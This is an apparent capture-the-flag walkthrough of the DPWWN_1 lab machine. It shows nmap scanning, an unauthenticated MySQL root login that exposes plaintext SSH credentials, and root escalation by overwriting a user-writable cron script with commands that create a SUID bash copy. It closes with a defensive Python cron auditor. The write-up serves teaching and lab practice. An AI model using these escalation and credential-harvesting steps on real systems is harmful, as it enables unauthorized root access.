DPWWN_1 Box

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:04 EDT
Nmap scan report for 192.1.1.142
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Ports 22, 80 and 3306 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:04 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00022s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

The UDP scan yields nothing of value.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:10 EDT
Nmap scan report for 192.1.1.142
Host is up (0.0019s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c1:d3:be:39:42:9d:5c:b4:95:2c:5b:2e:20:59:0e:3a (RSA)
| 256 43:4a:c6:10:e7:17:7d:a0:c0:c3:76:88:1d:43:a1:8c (ECDSA)
|_ 256 0e:cc:e3:e1:f7:87:73:a1:03:47:b9:e2:cf:1c:93:15 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open mysql MySQL 5.5.60-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 4
| Capabilities flags: 63487
| Some Capabilities: LongPassword, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, FoundRows, ConnectWithDatabase, LongColumnFlag, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: i7tdxO_q9h#q3GK#ik^t
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:74:F0:06 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds

Service versions: Apache/2.4.6 (CentOS) with PHP/5.4.16, and MySQL 5.5.60-MariaDB.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:14 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00026s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.22 seconds

The vuln script scan turned up info.php; opening it shows a phpinfo page, from which some system and path information can be extracted.

MySQL Login

Try logging in to MySQL.

┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ mysql -u root -h 192.1.1.142
ERROR 1129 (HY000): Host '192.1.1.128' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'

Hmm, something is off: too many connection errors. I guessed it was caused by the earlier scans. At first I ignored the error and looked for other approaches: I tried to find a foothold in phpinfo and brute-forced directories for hidden folders, but both failed; this box exposes very little. After a peek at the walkthrough, it was confirmed that the MySQL login is the attack surface, so I simply restarted the box. After that it was straightforward: look through the database tables for leaked information.

┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ mysql -u root -h 192.1.1.142
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2
Server version: 5.5.60-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.008 sec)

MariaDB [(none)]> use ssh
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [ssh]> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users |
+---------------+
1 row in set (0.009 sec)

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.002 sec)

SSH Login

With an SSH username and password in hand, try logging in.

┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ ssh mistic@192.1.1.142
The authenticity of host '192.1.1.142 (192.1.1.142)' can't be established.
ED25519 key fingerprint is SHA256:gk40nSGfkMrCYAeMyL2l9aCwV/VL5i5mWKrFfowOfH0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.142' (ED25519) to the list of known hosts.
mistic@192.1.1.142's password:
Last login: Thu Aug 1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$ whoami
mistic
[mistic@dpwwn-01 ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:74:f0:06 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.142/24 brd 192.1.1.255 scope global noprefixroute dynamic ens33
valid_lft 1336sec preferred_lft 1336sec
inet6 fe80::20c:29ff:fe74:f006/64 scope link
valid_lft forever preferred_lft forever
[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux
[mistic@dpwwn-01 ~]$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for mistic:
Sorry, user mistic may not run sudo on dpwwn-01.

Login successful. Next, look at the files in the current home directory.

[mistic@dpwwn-01 ~]$ ls -liah
total 16K
2536099 drwx------. 2 mistic mistic 100 Aug 1 2019 .
79 drwxr-xr-x. 3 root root 20 Aug 1 2019 ..
2536125 -rw-------. 1 mistic mistic 0 Aug 1 2019 .bash_history
2536100 -rw-r--r--. 1 mistic mistic 18 Oct 30 2018 .bash_logout
2536101 -rw-r--r--. 1 mistic mistic 193 Oct 30 2018 .bash_profile
2536102 -rw-r--r--. 1 mistic mistic 231 Oct 30 2018 .bashrc
2536126 -rwx------. 1 mistic mistic 186 Aug 1 2019 logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
read line
while [[ -f $SEMAPHORE ]]; do
sleep 1s
done
printf "%s\n" "$line" >> $LOGFILE
done

Cron Jobs

This looks like a cron job script, and the file is fully controlled by the current user, so let's check the cron jobs.

[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

*/3 * * * * root /home/mistic/logrot.sh

The rest is easy: copy bash out and set the SUID bit on it, or add the current user to sudoers.

[mistic@dpwwn-01 ~]$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > logrot.sh 
[mistic@dpwwn-01 ~]$ cat logrot.sh
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
[mistic@dpwwn-01 ~]$ cd /tmp
[mistic@dpwwn-01 tmp]$ ll
total 900
-rwsr-sr-x. 1 root root 918400 Jun 27 02:54 bash
drwx------. 3 root root 17 Jun 26 22:55 systemd-private-53b92180216b468cb1083272653633e5-chronyd.service-aSeucn
drwx------. 3 root root 17 Jun 26 22:56 systemd-private-53b92180216b468cb1083272653633e5-httpd.service-D495YP
drwx------. 3 root root 17 Jun 26 22:56 systemd-private-53b92180216b468cb1083272653633e5-mariadb.service-0VDwAm
drwx------. 3 root root 17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-chronyd.service-abFUnb
drwx------. 3 root root 17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-httpd.service-xbcok8
drwx------. 3 root root 17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-mariadb.service-m3bA7F
[mistic@dpwwn-01 tmp]$ ./bash -p
bash-4.2# whoami
root
bash-4.2# id
uid=1000(mistic) gid=1000(mistic) euid=0(root) egid=0(root) groups=0(root),1000(mistic) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:74:f0:06 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.142/24 brd 192.1.1.255 scope global noprefixroute dynamic ens33
valid_lft 1336sec preferred_lft 1336sec
inet6 fe80::20c:29ff:fe74:f006/64 scope link
valid_lft forever preferred_lft forever
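The root cause on this box is a root cron job whose script sits in a user's home directory and is owned by that user. The checker below is an added example, not part of the original writeup: it parses /etc/crontab-style text and flags root jobs whose script, or the directory holding it, is owned or writable by a non-root account. The demo() function builds a constructed, world-writable logrot.sh in a temporary directory (a hypothetical path) rather than touching the real one.

```python
import os
import re
import stat
import tempfile
# Constructed sample: the root cron entry seen on the box, plus a VAR=value line the parser must skip.
SAMPLE_CRONTAB = """SHELL=/bin/bash
*/3 * * * * root /home/mistic/logrot.sh
"""

def parse_system_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab-style text."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"\s*\w+=", line):
            continue
        m = re.match(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$", line)
        if m:
            jobs.append(m.groups())
    return jobs

def audit_job(user, command):
    """Findings for a root job whose script, or the directory holding it, a non-root user controls."""
    path = command.split()[0]
    if user != "root" or not os.path.isabs(path):
        return []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist"]
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: runs as root but is owned by uid {st.st_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable ({stat.filemode(st.st_mode)})")
    # A non-root owner of the directory can rename or replace the file even when it is root-owned.
    parent = os.stat(os.path.dirname(path))
    if parent.st_uid != 0 or (parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX):
        findings.append(f"{path}: parent directory is not root-controlled")
    return findings

def audit_crontab(text):
    """Map each flagged command to its findings; an empty dict means nothing to report."""
    return {c: f for _s, u, c in parse_system_crontab(text) if (f := audit_job(u, c))}

def demo():
    """Constructed reproduction (hypothetical path): a mode-0777 logrot.sh in a temp dir, scheduled as root."""
    script = os.path.join(tempfile.mkdtemp(), "logrot.sh")
    open(script, "w").close()
    os.chmod(script, 0o777)
    return audit_crontab(SAMPLE_CRONTAB.replace("/home/mistic/logrot.sh", script))
```

Run audit_crontab() over the real /etc/crontab and /etc/cron.d/* contents to get the same report for a live host; the fix is a root-owned script in a root-owned directory with mode 0700.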


https://i3eg1nner.github.io/2023/06/15e7bb7309ab.html
Author: I3eg1nner
Published: June 27, 2023